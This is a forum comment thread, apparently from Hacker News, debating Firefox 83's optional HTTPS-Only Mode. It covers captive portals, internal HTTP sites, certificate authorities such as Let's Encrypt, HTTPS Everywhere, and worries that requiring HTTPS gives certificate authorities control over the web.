I have gear on my LAN. No SSL, or self-signed, expired certs. I don't care. Ever. Why would I spent 10 seconds setting such things up? They're locked behind a firewall, (a secondary firewall), have no direct network access, and can't even be reached without port forwarding via SSH.

Yet, do you think I can tell my browser "never ever prompt for this again"? Nope. Nada.

I have zero issues with safer defaults, prompting when required. However, the idea that "Firefox knows best" is the sort of asinine behaviour that causes big tech issues all the time.

My point is, this is going to be annoying... not because of the feature, but instead, if I enable it, I'll be cut off from legacy sites by a wall of forever "Do you want to really do this?" with likely 10 clicks of 'yes' and 'ok' and 'i understand', combined with never storing this as a default.


That's why it's important for features like this to be enabled in at least a couple of major browsers at roughly the same time. That way, users will blame the website operator instead of the browser when they suddenly can't access an insecure website.


I wonder how it will work against websites like http://neverssl.com (which helps me to log in to some wifi portals, HTTPS Everywhere shows the prompt for a temporary exception.)


An alternative I use is http://captive.apple.com (other OS vendors have their own). Which may have a higher chance of being detected by the portal (more likely to be white-listed) and triggering the prompt correctly.


Frustratingly it doesn’t always work that way - one I have seen that is just bizarre is Qantas inflight wifi. It actually allows captive.apple.com to bypass the captive portal, so your iPhone, iPad or Mac thinks it has internet access. So you try to navigate to a page or use an app and just hit HTTPS certificate errors! So you have to think of some other site that is only HTTP or get the information card and enter the address it tells you to log in!

It’s crazy, because somebody must have had to configure something to explicitly let that through (not understanding the purpose of it?) and it just completely breaks it! I’ve tried to leave feedback (there is a link from the portal page) that they’ve screwed it up but it hadn't been fixed the last flight I went on..


It might be forging responses from captive.apple.com and not actually sending those out to the internet. If you set up your own intercept that responds 'Success', iOS will assume it has internet as well.


Like the sibling post said, you're probably seeing certificate errors caused by the portal, not traffic being allowed to captive.apple.com.

With http, a captive portal system will intercept your connection and redirect you to the portal authentication page. Most modern devices deal with it automatically by checking those plain http urls when the network comes up. For example, I think the way it works on iOS is that when you connect to a WiFi network the OS tries to hit http://captive.apple.com which triggers the redirect and prompts you for authentication.

With https, there's no way to have a valid TLS certificate for a random site the user is connecting to (ex: captive.apple.com), so you get a TLS error if you're attempting to connect to an https site while the portal is trying to redirect you for authentication.


Perhaps they were told to make Apple stuff work without login, and just blindly whitelisted all known Apple host address ranges.



It will say "this website doesn't support https, do you want to connect anyway"


Just checked this yup.

If I go to https://neverssl.com/ I get a warning explaining that this site doesn't have a certificate for neverssl.com but only for Cloudfront (presumably where it's hosted)

But if I try to go to http://neverssl.com/ then I get the message explaining that the HTTPS site doesn't work, do I want the insecure HTTP one instead?


If I specify http://whatever.com in the address bar, or if I follow a link to http://whatever.com, I'd expect it to attempt to connect to port 80 on whatever.com, and not redirect to https unless the page responds with a Location header

If I type "whatever.com", I'm happy with it to try port 443 first

I'm not sure if a http/80 page should be at least HEADed to see if there's a redirect to https/443 before throwing up the "this is not secure"


I can understand your use case, but I know a lot of people (often those who use computers infrequently) type out the full URL all the time. They don't know what HTTP or HTTPS is, they don't realise you can omit that part. They just want to access the website.

For those people, it makes sense that typing "http://" would take them to the "https://" site if available. Although they did specify HTTP, it isn't necessarily what they actually wanted.

I think the use case you describe (whilst valid) only applies to a relatively small pool of people. Most people don't really understand HTTP or HTTPS very well. They know it's part of the web address, and some know that "https://" is "secure", but that's about it.

I think it makes sense to direct people to the secure version of the site as much as possible, whilst of course providing a mechanism to switch to the HTTP version if necessary.


Most people type the address into google.

If the server says that the thing on port 80 is better served from port 443, then it can issue a 302 permanently move (and a HSTS header to make it stick). If the server offers different content on port 80 and port 443 then the server can do so just fine.

The browser should not try to second guess my explicit instructions.


Many users don't know the difference between http and https, so if you're trying to get them redirected to a captive portal page it's a lot easier if the default is http.


That kind of sucks because if a user misses the initial OS redirect for a captive portal login, the easiest way to get them back to the authentication page is to have them hit an http site. However, things like HSTS make that really hard to do without having a site that does NOT use https and defaulting to https is like having HSTS triggered on every site.

Having to tell them to click through a non-https warning is almost as bad as having to tell them to click through a TLS warning.


Captive Portals are the thing that sucks in this situation though.

If you offer "free" WiFi behind an annoying Captive Portal chances are I'll just use my 3G service if it works. Now, in my mind do you think I consider you offered me "free" WiFi? No, it was too annoying to use. So your competitor that didn't bother with a Captive Portal site and just posted their WiFi password on a chalkboard - they have free WiFi and you don't.


I'll have to remember that for next time I get "wireless on the train doesn't work, I get some security error" via SMS.

Last time I pointed them at one of my sub-domains that still serves plain HTTP to bring up the captive portal (which wasn't trying to charge, or apparently even advertise, the network just insisted you hit it at least once to be told "Hello!" and presumably have your MAC added to the whitelist for a time).

The name "neverssl" might confuse non-techies though. Maybe I'll register something like iswirelessbroken.com for doing the same thing.


Captive portals are not unique to wireless networks so if you are gonna register a new name you might wanna go with something more generic (like "isnetworkbroken.com" or something like that).


Firefox has is own such domain, detectportal.firefox.com, which would presumably be excluded. But otherwise, it looks like the user will just have to turn it off for these kind of sites. Same goes for things like browsing APT update servers that don't use HTTPS by design.


Firefox by default tries to connect to http://detectportal.firefox.com/success.txt in order to detect captive portals.


It might be time to introduce a protocol that allows networks to display authentication prompts without needing to MITM HTTP connections.

It's not even hard, all that's needed is to add an "authentication URL" field to DHCP and IPv6 router advertisements.


https://tools.ietf.org/html/rfc8910 Captive-Portal Identification in DHCP and Router Advertisements (RAs)

Actually the future is ambient network access. But on the way there, the likely pathway is larger and larger federated network authentication. Most of the world's higher education students/ staff are enrolled into EduROAM, so that it doesn't matter if they're in a classroom in Tokyo or London, the federated system concludes they are a legitimate user somewhere and so they can connect here. In these federated systems there's no use for a "Captive portal" since it could not safely achieve federated authentication, so there isn't one.


Isn't it part of what "Hotspot 2.0" (https://en.wikipedia.org/wiki/Hotspot_%28Wi-Fi%29#Hotspot_2....) provides?

It certainly solves the login part, it might also solve the register part?


I personally access 10.0.0.1 and that works at numerous places with wifi portals. Especially useful when my device/browser doesn't automatically detect that there is a captive portal.


This feature is not enabled as default in Firefox 83.

To enable it, make sure you have Firefox 83 installed. Then go to about:preferences#privacy and scroll down to the section "HTTPS-Only Mode" and make your selection.


This is a great step, but I wish browsers would allow you to set domains that are considered to be secure origins in all cases. I have a decent intranet with transport security guaranteed by VPN, but because it isn't "HTTPS" I can't access tons of browser features.


Have a look at Let's Encrypt DNS challenge. I created a DNS wildcard certificate for a subdomain I own and use it for all my internal domains. A great way to get HTTPS on non-public networks.

HTTP over VPN is still weaker than HTTPS over VPN. For example HTTPS also handles authentication which HTTP doesn't. If you're outside of your VPN, a MitM could redirect you to http://my-internal-domain.example and resolve its DNS to an attacker's website. Your browser would not understand the difference between this and your actual website in your VPN. It would send all the site's cookies to the evil website, and if Service Workers[1] worked over HTTP, this would actually be a way to completely compromise an internal HTTP website. So it's important not to whitelist such HTTP sites as if they're secure.

[1] https://developer.mozilla.org/en-US/docs/Web/API/Service_Wor...


Deploying to a mix of internal devices, many of which lack the ability to easily allow automatic certificate renewal, is not trivial.


Put a reverse proxy in front of it.


This is generally the best way, as it allows you to use things like client certificates or some other form of authentication to enforce AAA, and reduce the requirement of using VPN (which itself increases the security as it reduces the number of holes in your network)

Of course it's still unsecure from your proxy to the device, but that's a more managable risk


Also note that with DNS01 challenge you can add multiple wildcard domains under one certificate. There is a limit of total domains in a certificate but I still find it interesting and helpful.


In Chrome/Chromium-based browsers, you do exactly that here: chrome://flags/#unsafely-treat-insecure-origin-as-secure


According to [1] you can disable this for individual sites.

[1] https://news.ycombinator.com/item?id=25121929


I've set up internal CA using minica [0] and trusted that CA in Chrome and Firefox with success. Each host got it's own key, and I'm not even using proper DNS server - I use Avahi, so all of my hosts are available as somehostname.local on all clients with Avahi/Bonjour installed.

[0] https://github.com/jsha/minica


Isn't this what HSTS does? Maybe a way to manually add domains to the list would be good.


I think GP is asking for a whitelist of HTTP-only domains the browser should consider safe.


HTTPS guarantees a higher level of security than "intranet", it works against on-path adversaries and provides end-to-end confidentiality & integrity & authenticity, plus provides forward security.


This is an important point: Modern TLS is often better crypto than most commonly deployed VPNs.


As a developer I likely won't use this feature much, considering most of our internal development sites are http only. For the general public it might be useful though, especially the auto-upgrade feature, protecting them from the lazy network operators that didn't add a proper auto-redirect.


According to another comment, you can still allow certain sites through http, so your Internet dev sites are still fine but the global sites will be blocked by default


Sure, but we have like 50 different internal domains for different customers, so that would get annoying real fast ;)


I haven't tried out the release UX yet but if it is just a couple of clicks inline when you fist visit this doesn't sound that bad. I would go though it for the added feeling of privacy and security whenever I am on a public connection.


Well, you have to specifically enable this feature. So don't enable it.


For now. These features tend to migrate from being optional to being default to being default and hard to turn off


Which indeed is why I said I likely will not use the feature above.


You could use a self signed certificate.


> As a developer … most of our internal development sites are http only.

As a developer, should you not work against an environment closer to production behaviours? Otherwise you might miss performance issues (due to different caching behaviours between http/https) or other problems until your code is released.


Its not always the code you work on. It might be other internal services or sites.


All our internal services are HTTPS. Then if a new hack is found to weaken wireless protocols we have that extra line of protection. Security in depth.

We serve strongly regulated industries and are subject to in-depth audits by clients on occasion, so perhaps my level of paranoia would be less warranted elsewhere. I'd still HTTPS everything though, even if the potential payoff is small because the required effort is too.


public certificates? Do you use wildcards, or are you unconcerned by leaking information like servernames via CT?


Public wildcard cert for centrally managed things.

Of course only a trusted few have access to the private parts of the certificate that covers centrally managed things. For local dev instances I suggest having a local only meaningless domain and a wildcard off that,

If we were using per name certs and name leaking were a significant issue we could instead sign with a local CA and push the signing cert out as trusted to all machines we manage.



I've used this for a few months now. It ugrades non-https connections on secure pages automatically. Very useful. Even big sites like microsoft, google images serve things over http

dom.security.https_only_mode = true


Thanks for mentioning this! This about:config flag is also available in Firefox ESR 78 already (but there is no GUI for it yet).


Are there about:config entries to handle excluded sites?


I was interested in this as well. Unfortunately, excluded sites are configured using PermissionManager <https://bugzilla.mozilla.org/1640853> which stores data in permissions.sqlite.


It seems no / I could not find any.


I tried this but I ran into a lot of issues so I just turned it off again.

For example: Twitter would periodically refuse to load. You'd have to force refresh Twitter for it to load once again.


The twitter problem is not related to this. Even I get it with this tweak disabled. It's definitely some other about:config tweak we have enabled.


I do worry about the sort of monoculture with Let's Encrypt. A second and third provider that do the same thing would reduce the blast radius for potential outages. Grateful for LE, but there's a lot riding on it. Similar for Cloudflare.


I see at least two other ACME based Free CA services:

https://www.buypass.com/ssl/products/acme This one appears fully drop in compatible with LE, except that it does not offer wildcards.

https://zerossl.com/ Does offer wildcards, but slightly less compatible, because you need to sign up with a web form, and provide your credentials via the optional ACME EAB feature (External Account Binding), so not all tooling will support it.


Yes, LE goes boom for some reason, and there's at most 30 days to get a working replacement online before server certificates start failing.

I'll try to keep my tin hat stored.


Or just a day, if people wait till the deadline


I'm for this. Any computer capable of running FF83 is powerful enough to use HTTPS everywhere.

What it doesn't do, is force good TLS - there's nothing to stop a site using a weak algorithm, SSLv2/3, or old TLS versions.

It also wrecks network-level caching using appliances like Squid.


> What it doesn't do, is force good TLS - there's nothing to stop a site using a weak algorithm, SSLv2/3, or old TLS versions.

TLS 1.0 and 1.1 were disabled in Firefox 78 in June.


That's good news. I know there was some flip-flopping over this because of covid and gov sites requiring old encryption. Great to hear that it's now done with.


Once this sort of thing is widely accepted, we'll see various blogs and websites silenced by having a certificate revoked. Not right away but soon enough.

It's a very exciting development. It's managed to use the geek "Everything has to be like this!" fanaticism to drag in a mechanism of control.

I wonder which of the Four Horsemen it will be used against first.


There's a ton of trusted roots across multiple countries. I think the odds are virtually nil that none of them would let you have a certificate.


Certain governments already require their root beer the only one trusted by software in their country.


Which governments and which software?


"When Firefox autocompletes the URL of one of your search engines, you can now search with that engine directly in the address bar by selecting the shortcut in the address bar results."

This is what I've been missing from chrome!


Oh wow, this is huge! Ever since switching back to FF, I constantly forget what my "shorthand" shortcut is for my custom search engines.


Judging from the comments here, they really should've added the word "optional" in the title.


“Mode” means “a way that it can operate”.


"optional mode" problem solved.


“HTTPS-Only Optional Mode” reads terribly and is much more subject to confusion than “HTTPS-Only Mode” was.


It is optional for now, but as they say at the end the intent is to eventually always require HTTPS.


HTTPS is brittle.

HTTP is insecure, but will run forever.

This move will literally kill the old web.


One more reason to move to gopher:// and gemini://


gemini didn't ring any bell for me, for those like me,

https://gemini.circumlunar.space/docs/faq.html


I would hope you could expand on this a bit?


Not OP but:

HTTPS is not secure because it is centralized and it does not protect against MITM.

HTTP is the foundation of our civilization, it will never go away how much certificate sellers try.

But I would go one step further and point out that HTTP can be made secure manually selectively so that you only secure the things that need security!

HTTPS wastes energy by encrypting cat pictures, and we don't have that much cheap energy left!

But don't worry this will not kill HTTP only Mozilla/Chrome. Chromium will always allow adblockers for free and HTTP, because if they remove it, I'll fork it and add it back in, even if it takes 1 day to compile!


To me, HTTP is the wrong target. It would be much more interesting to replace IP, like Yggdrasil does (and I think gnunet, cjdns, hyperboria & others).

If you IP is a cryptographic identifier:

* It cannot be forged

* Anyone can generate a new one on-demand

* Every packet is authenticated, every packet can be encrypted

* TLS becomes redundant

However, the DNS part remains a hard one. How to securely link to websites you have never seen? Pet names seem like a way to do so. Asking users to type IP addresses isn't really an answer, I think, but I don't know if there's a lot of "basic" users who type URLs in nowadays, they all seem to rely on google providing the right website anyway, or the web browser itself.

It's not like DNS is also our single source of trust nowadays, but at least certificate providers are competent enough to make sure names are resolved correctly.

One option would be to make signed DNS records over a DHT: the root authority "." signs "com", "net", etc, that sign "ycombinator", etc. Publish to DHT, hash-indexed.

Of course, point-to-point connections have their weaknesses as well, it might be interesting to migrate to something like beaker browser (html on top of hypercore, formerly DAT, kind of like mutable torrents in a DHT). At the end of the day, the core issue is: migrating users is difficult if the benefits are not immediately obvious.

And yes, massively adopting anything else would litterally "kill the old web", in the protocol sense. In the community or content sense? Not so sure.

https://yggdrasil-network.github.io/

https://gnunet.org/en/

https://github.com/cjdelisle/cjdns/

https://beakerbrowser.com/

https://hypercore-protocol.org/


IP is even harder to replace, it is completely fossilized by this point and that is a feature. The challenge is not to replace the pipes but to build something meaningful using the pipes we have without too much added complexity:

I built a realtime MMO stack using only HTTP/1.1 for network.


You can always build a transition infrastructure on the top of IP, like https did by coexisting with http, and a bit like gemini does (it has https://gemini.circumlunar.space/ at least).

Then build some links without it, and have the compatibility layer the other way. If there are compelling reasons to use the new protocol, it might gain some traction. Maybe we'll turn off IP, but probably not within a century, unless some organization acquires a tremendous amount of control over the Internet.


I have been using HTTPS Everywhere for many years: https://www.eff.org/https-everywhere


Reading the docs (and my memory) HTTPS Everywhere works based on a predefined list of sites that should be upgraded.

The nice thing about the new Firefox feature is that the browser won't make any insecure connections unless I explicitly allow it.


Yes, but one less extension with access to all your history, passwords and all other info.


WebExtensions have permissions and I doubt the EFF requests passwords and history for this extension. It’s also open-source, and although installing it from addons.mozilla.org could introduce some sort of MITM opportunity, as a recommended extension Mozilla puts it through a review process, so it’s about as tame as an extension this capable can get. But yes, it is always nice to reduce extensions installed.


I have been using HTTPS Everywhere since forever. Here are the permissions required:

* Access browser tabs

* Access browser activity during navigation

* Access your data for all websites

So can be pretty devastating if it went rogue, which I doubt.


Passwords come under 'access all sites', which HTTPs everywhere needs.


I'm not sure if I trust EFF any less than I trust Mozilla.


I am the same but in this case it is about trusting (EFF and Mozilla) more than Mozilla. You have to trust Mozilla either way.


I already trust Mozilla with everything. I do everything on my browser. It is always better to reduce extensions. I look forward to a day when I have nothing but uBlock Origin in my browser


> In summary, HTTPS-Only Mode is the future of web browsing!

It has certainly seemed like HTTPS is the future of the web for the last few years. I love this HTTPS-Only mode and wish it would become the default (with better downgrades and messages for users who may not understand what it means). With the number of HTTP-only sites dwindling, this could result in a faster experience for sites that do not want to (or haven’t figured out how to) use HSTS or HSTS Preload (no redirects from HTTP to HTTPS) and for users who haven’t heard of the HTTPS Everywhere [1] extension.

[1]: https://www.eff.org/https-everywhere


There are a lot of confusing comments in here. Maybe I'm in the minority but I use chrome, which seems to default convert to https on any site that supports it, and will provide visible warnings when the site doesn't support https.

Also man in the middle attacks seem massively overblown. If you are sitting at home on your private network, the likelihood of a man in the middle attack is stunningly small, such that it's completely irrelevant - especially in regards to the likely trivial content being viewed over http.


There's a phenomenon I observe quite regularly in tech. A problem exists and creative people develop an innovative solution to said problem. The solution then becomes popular and a singular goal of uncreative people who deploy said solution everywhere and push it to its logical extreme.

I remember seeing this in the mid-2000s when HTML tables were shunned in favour of "divs". I saw people reinventing tables using divs and CSS to display tabular data. Completely missing the point, of course.

This is an example of that for me. How can I possibly trust every single website I visit? It means nothing to connect to a news website, say, and see the "green padlock". Who am I trusting exactly? That I've successfully connected to some load balancer that is operated by "super-trustworthy-tech-news.com"? What's the use in that? Am I supposed to trust them more than some man-in-the-middle just because they own a domain name?

But maybe it's for privacy? If you want privacy you use tor. HTTPS does nothing for privacy when it's the same tech giant on the other end that is collecting all the data. It just means that said tech giant gets exclusive access to that data. Great.

All this does is train people to not care about security and to just trust us to do the right thing because they are too stupid to get it. Sooner or later there will be an event where a government compromises a CA. Bad luck. Some Americans already decided this was a solved problem and that this could never happen.


Couldn't agree more. Benefits of using HTTPS for most websites are doubtful, but the costs are real, in overhead and caching problems. We don't need the same level of security everywhere. (I'm not even sure we need that much "security" in general, but that's another topic.)

It's sad to see Firefox continuing to bother itself with solving non-problems while serious bugs go uncorrected for years.


HTTPS ensures the following things

1. You are talking to the domain that you think you are. 2. No one else can see the traffic in transit. 3. No one has modified the traffic.

It does not provide any guarantee around the trustworthiness of the domain itself. (Well EV Certs try but as far as I am concerned that is worthless.)

1 and 3 are not helpful in your example of "Am I supposed to trust them more than some man-in-the-middle" but it does help once you establish other trust in that domain. For example a friend sent you the link, or you start using the site regularly.

However personally even just 2 is a tangible benefit when I am using public connections. I very much like the idea that my browser will not send out an unencrypted data without my explicit approval.


> Am I supposed to trust them more than some man-in-the-middle just because they own a domain name?

You can be assured that you are actually talking to them. That's a big step up from not being able to do that.


Depends on the content of the website. A lot of websites wouldn't benefit at all from that assurance. A lot of blogs and random personal projects come to mind. My own blog does not care about authentication or MITM at all. It would be just an unnecessary complexity without any benefit.


It's not the websites that get that assurance. Maybe read up on it.


I do understand that.


> Am I supposed to trust them more than some man-in-the-middle just because they own a domain name?

The green padlock will not turn any unreliable fake news site of your choise in a trustworthy outlet but it does make some guarantees about it being the same site as yesterday (barring security leaks or missed DNS renewal)

AFAIU the elefant in the room is that if your DNS resolver is malicious and points all domains to a malicious IP then https is completely useless.


> but it does make some guarantees about it being the same site as yesterday

No it doesn't. Are you thinking of TOFU via public key pinning?


I was oversimplifying my limited understanding. What I belive should be true is that you are connecting to a server that:

1. managed to obtain a valid certificate from some recognized autority

2. managed to steal a valid certificate for the domain in question from another server

3. managed to convince enough DNS resolvers to point to their IP for a given domain (so to get your traffic and/or pass LE challenges)

and/or other conditions. From an operational perspective it says very little, especially considering the third case where any public wifi network has in most cases total initial control over your DNS traffic.


> if your DNS resolver is malicious and points all domains to a malicious IP then https is completely useless.

100% false. HTTPS absolutely protects against that.


Tables are better as well in the sense that they are a higher level representation than divs. The problem was that people were then using tables as a way to layout pages rather than to use them to display tabular data.


I think it is deeper, the problem is that HTML tables are serialized in row and columns separately, so for example if you wanted a cell to be 2 rows tall and 2 columns wide there wasn't a local change that could allow it.

To my understanding CSS Grid is meant to solve this


Yes there was: colspan.


thank for the correction, then my position is that with rowspan and colspan tables were sorta nice :)


Thank You!


This comment is why people make fun of HN.


What I don't understand is why there isn't a simple button when you land into a HTTP page to switch to HTTPS.

In the browser bar, to the left the address, you get an icon of a padlock, with a red slashed circle across it, and the word "Not secure".

Why can't you click on this to get a popup to switch to trying the HTTPS version of the URL?

You can click on it, you get to a read-only tree of information providing info about the site.

If you right click on it, you get a context menu popup about customizing the toolbar.


Because that’s a lot of hidden UI for something people rarely want to do (be on an insecure version of a website while a secure version exists) and might not work and that they can still do relatively easily by typing ”s”.


The lot of hidden UI is already there; all it needs is one menu command.

There is UI for printing a page; I'm pretty sure I've adjusted a HTTP to HTTPS more times than I've printed a web page.

> still do relatively easily by typing ”s”.

You have to position the cursor first; it's annoying.


A long time ago I suggested a new uri prefix - "secure://" - that would be a synonym for "HTTPS-only". If you visit a secure:// link, every single page load in the session would require strong encryption, secure cookies, etc.

The idea was to allow http if needed, and alternately allow strict https if needed, in a backwards compatible way (visiting a https:// url would work as before, but visiting secure:// would trigger the strict security for the rest of the session). This way you have the best of both worlds and the user (and server) get choice/agency.

The purpose was to stop MITM. The ability to MITM only requires blocking port 443 and letting the browser fall back to 80; this works even against HSTS because most people will just try other URLs until one works. So you need a way to avoid MITM at least for some specific requests. Banks, e-mail providers, etc would say "type in secure://mybank.com in your browser for strong security".

Another option was a "secure only" button on the browser. It seems they're moving towards this. They've buried it in preferences, which hopefully they'll change to the front UI. But I still think the secure:// links are easier for laypeople.


A lot of things should be better in theory, like adopting PAKE schemes (like "OPAQUE") that could perform a two-way authentication and key negociation over an insecure connection by just displaying a login prompt.

As always, the issue is adoption. What good is a solution if no browsers implement it? Catch-22, which is usually broken when a giant (google nowadays) decides to break it. And they need incentives to do so. Which is why we need the non-profit Mozilla giant. badly.

https://en.wikipedia.org/wiki/Password-authenticated_key_agr...

https://news.ycombinator.com/item?id=18259393

https://tools.ietf.org/html/draft-krawczyk-cfrg-opaque-06


Why depreciating http in the long term? It should simply ask an annoying user confirmation that take all the screen. Removing my ability to visit the old web is pure nonsense


Where you see security, I see control. A way to commoditize the launch of ideas and information. Maybe 30 years from now, they will not prohibit any type of communication that is not properly licensed and standardized. As they do with commercial imports and exports. In Brazil today when you buy a product from another state of the federation, the tax goes partly to the origin of the product shipped and partly to the destination where it is purchased.


How does that commoditize the launch of ideas and information?


Introducing a commodity into the cost of a website


When enabled, it forces a domain to be signed by a CA to be displayed. Effectively giving the CA a veto over the content.


I guess, but only in the way your power provider has veto over the content. The CA doesn't care about the content, only about you proving that you own the domain.


Like CAs, the power company can be controlled by the government.

Let's say governments ban youtube-dl. The prosecution gets a court order to order CAs to not renew youtube-dl.org. If they're using a Let's Encrypt style 30 day certificate, youtube-dl has 30 days to comply or be soft-banned from the internet.


Why go to the CA when they can just order the domain itself to be shut down? If there's a court order against you, your site being HTTP won't save you.


Introducing a commodity by-product into the cost of a website


Not every web service is easy to set up with HTTPS as a simple Let's Encrypt service. Take a game. It dynamically balances between servers rented and destroyed on the fly. It needs a wildcard DNS certificate. Then all the sub-servers need to have that wildcard certificate.

In conclusion, deprecating HTTP makes it harder for people to get started on the web. How are you going to get certificates for IP address' control dashboard, after all?


Similarly I got stung by Chrome recently.

I have a side project that plays webradio streams. A lot of them don't have https, some links even are ip addresses and Chrome won't allow to request them on my https site. In the end it forced me to create a stream proxy that I have to host...


>It needs a wildcard DNS certificate. Then all the sub-servers need to have that wildcard certificate.

Just give each server a separate domain and certificate as you create them. The matchmaking algorithm returns a url pointing to the server.

>How are you going to get certificates for IP address' control dashboard, after all?

By clicking the damn button?


> Just give each server a separate domain and certificate as you create them. The matchmaking algorithm returns a url pointing to the server.

Do you mean a separate subdomain? (A separate domain would be very expensive.) I would need to figure out how to generate and provision certificates, in that case.


A game absolutely should be use HTTPS anyhow, for their own security.

But I'd say that anyone that has an operation so big that it dynamically creates and destroys servers to balance load should probably already be paying for their own wildcard cert anyhow.


> A game absolutely should be use HTTPS anyhow, for their own security.

The game has no log-in or sign-up; no account system. The only potentially sensitive data sent is the nickname the user enters.

> But I'd say that anyone that has an operation so big that it dynamically creates and destroys servers to balance load should probably already be paying for their own wildcard cert anyhow.

The game is free and ad-supported. Dynamically creating and destroying servers is a basic requirement.


Wonderful, I'll definitely enable this! I'm pretty surprised it hasn't been a thing for years and isn't the default now.


Good feature in general. A few old sites that will get a bit more annoying to use because that fact is now pointed out to the user. But otherwise no impact for users.

I hope it does not get too annoying for backend developers for running things locally because locally you typically don't set up https.


Actually I'm using 3 browsers on my Linux PC:

- Links2 (in graphics mode) — main, for fully no-JS browsing;

- Pale Moon* (in Private mode) — main, for browsing w/ & w/o JS;

- Firefox — for curious reasons if target website is not working in Links2 & Pale Moon.

In last year I used Firefox maybe twice, as Links2 & Pale Moon.

As for Android mobile:

- Termux app + Links2 (in non-graphics mode) — main for fully no-JS browsing;

- Prvacy Browser — main, for browsing w/ & w/o JS;

- DuckDuckGo Browser — for curious reasons if target website is not working in Termux/Links2 & Privacy Browser.

P.S. In conclusion, happy to see Firefox is still growing, but every release just brings many "hardcoded" features that, as for me, should not be "hardcoded" in free & open-source browser.


Like others, I'm not exactly inspired by this feature. I'm an advocate for HTTPS-everywhere, but I think we're quickly moving past the point of usefulness for most people.

On a personal level, as a developer, I actually find the ban on mixed connections on a web page much more frustrating. It's easy for me to get a cert for nginx for my side project. It's another thing entirely to figure out how to give my application server access to the certs in the "right" way so that the application can terminate wss:// connections. I have to figure it out, of course, because firefox will refuse to connect a ws:// connection on a https page.


I don't understand your problem. Nginx should proxy all connections including websocket ones. Just don't expose your application server and use nginx as a reverse proxy.


I don't understand my problem either - if I did it wouldn't be a problem! I'm not here fishing for tech support, but this is a real thing I'm encountering and I don't know that expressing disbelief feels productive?

The point I'm trying to express is that giving a cert to your webserver is often only the first step in a relatively complicated process of securing all you assets. I wish browser makers would ask about blocking insecure connections instead of doing it by default.

If you're interested in the kind of thing I mean see below:

------------------------------------------------------------------------------------------

So, for example - I'm running a quart server on hypercorn for a side project. Just giving nginx the certs will not, for reasons I don't understand, allow a wss:// connection to successfully connect (returns a 400). The developer conversation around this[1] suggests giving the certs to the application server. I can confirm that this works, but again I don't understand why.

[1] https://gitlab.com/pgjones/quart/-/issues/319


It could be because Host header supplied by nginx to your appserver by default will be something like 127.0.0.1 instead of yourwebsite.com.


One thing I’ve noticed in HTTPS mode is that sites where I used to lazily type "foobar.com" (resolving to "www.foobar.com" over HTTPS) do not necessarily auto-direct anymore, instead displaying the scary message first. Whereas, typing "www.foobar.com" directly does not trigger the message.

I’m not sure where the auto-switch from "foobar.com" to "www.foobar.com" occurs; if it’s in the browser, ideally Firefox would attempt this auto-correct first and try the HTTPS connection to the corrected location, to minimize the chance of triggering a warning.


The redirect gets sent by the server. foobar.com and www.foobar.com are technically different domains, even if conventionally one should always redirect to the other.


This is great and all--and cheers to HTTPS Everywhere fans throughout this thread, but none of you are answering the question "can I uninstall HTTPS Everywhere now as a result of this feature shipping?"


Do you want the most HTTPS connections you can get with almost no chance of inconvenience? Then use HTTPS Everywhere in the default mode. If you don't mind seeing that you are about to connect to a HTTP site and click ok if you want to contine then yes, you can get rid of HTTPS Everywhere. In this case you will get occaional shocks like "Why is my bank's website giving me a HTTP only warning? Oh, it is because there is a HTTP only redirect to the www domain."


In case you are wondering what are the biggest websites that don’t do https by default: https://whynohttps.com/


> Data last updated on 11 Jan 2020 at 23:51 UTC

I wonder if that will get an update next January. I'd also be more interested in a list of popular sites that don't support HTTPS at all, i.e. the sites that will trigger a warning prompt under this new HTTPS-Only Mode.


"we expect it will be possible for web browsers to deprecate HTTP connections and require HTTPS for all websites"

Thinks about the implications of this. It will be impossible to host any web content unless you get blessed by a well-known CA (packaged in the platform/browser CA store).

That's why we have Let's Encrypt, right? Yes, thanks to them.

Now imagine a future where Let's Encrypt goes away, for whatever reason.

Now it's impossible to host any web content without getting approved by a commercial CA.


Firefox is my primary browser on desktop and Mobile.

On Windows 10, I use Cold Turkey to block distracting websites. I often have issues with Firefox bypassing the blocks on Windows, ignoring the Hosts settings.

On Android, Block Site addons are not compatible with the new Firefox for Android.

I love Firefox, but some recent changes make me feel that I have less control over my browsing experience.

I hope they don't make things 'default' for our 'protection', rather leave some things to the user to decide as per their preferences.


My blog doesn't have cookies, javascript, forms, no server-side, just html files, why should I go with https to avoid this discriminatory treatment?


You ensure that the content you serve is exactly what arrives on the reader's machine.

The most prominent example is ISPs inject ads or messages. Search for "comcast injecting ads" to see some examples.


That sucks. If I know my ISP is doing that I would definetively change it.


This happens on the visitor's end. So it depends on the ISPs of individual visitors of your blog.


Is HTTP (without the S) only risky if you're transmitting data, and not just browsing?


An insecure connection can be trivially eavesdropped (e.g. by your network peers, router, ISP or intermediate hops). Much of the time this will include identifying information such as your IP address and browser cookies. Consider reading medical publications or other personal topics and having that logged by an unrelated third-party. TLS adds significant privacy to your browsing habits, even when not transmitting data, per se.

Edit: and, as others have said, the content can be modified by a man-in-the-middle attacker, which can inject fake content or malware.


No, you're still susceptible to MITM attacks. I could imagine an election info site, that said the election was November 3, being MITM'd by an adversary who changed the page to say November 4, causing many voters to miss the election by a day.


Is there any concern for how much power LetsEncrypt holds over large swaths of the internet in a world where browsers refuse to connect using HTTP?

What prevents LetsEncrypt from censoring entire domains by refusing to renew their short-lived certificate?


Just switch to a different provider for your certs. The startup I previously worked for switched from LetsEncrypt to AWS-provided certificates since we were already using their ALBs.


This is a "rewriting reality to fit our agenda" kind of a post.

> The majority of websites already support HTTPS

When I run a webserver on a machine I just set up, it has no certificate, certainly not one signed by anybody else, and there's no reason I need to be forced to use encryption with it.

> and those that don’t are increasingly uncommon.

False. Although - for fashionable Silicon Valley companies, "most websites" probably means something like Facebook, Google, Amazon, Wikipedia and a few others.

> Regrettably, websites often fall back to using the insecure and outdated HTTP protocol.

HTTP is "outdated"? "Fall back"? ... Seriously?

I guess we're just lucky FF's share has dropped so far that we shouldn't worry about this stuff. I just hope other browsers don't do this (although - who knows, right?)


How many people actually understand what securities HTTPS provides. I remember clicking through them not knowing what they meant or thinking there was nothing I can do about it. Or thinking no one REALLY can snoop except in theory.

And that is the problem.

HTTPS messages need to reform. How about “the website and its data is observable and can be spied on by a third party along the network. Please be careful when entering data.”


This is why you block DNS selectively at your local gateway AND host a DNS resolver there as well while blocking ALL DNS except to your gateway.

Web browsers have no business using DNS over HTTPS, none; nada. zip.

We've opened a can-of-worms ... for malwares to evade further network detection ... effectively with DNS-over-HTTPS.


It's obvious I need to spend more time researching Gemini and similar things. The "web" is going to be a true monoculture very, very soon.


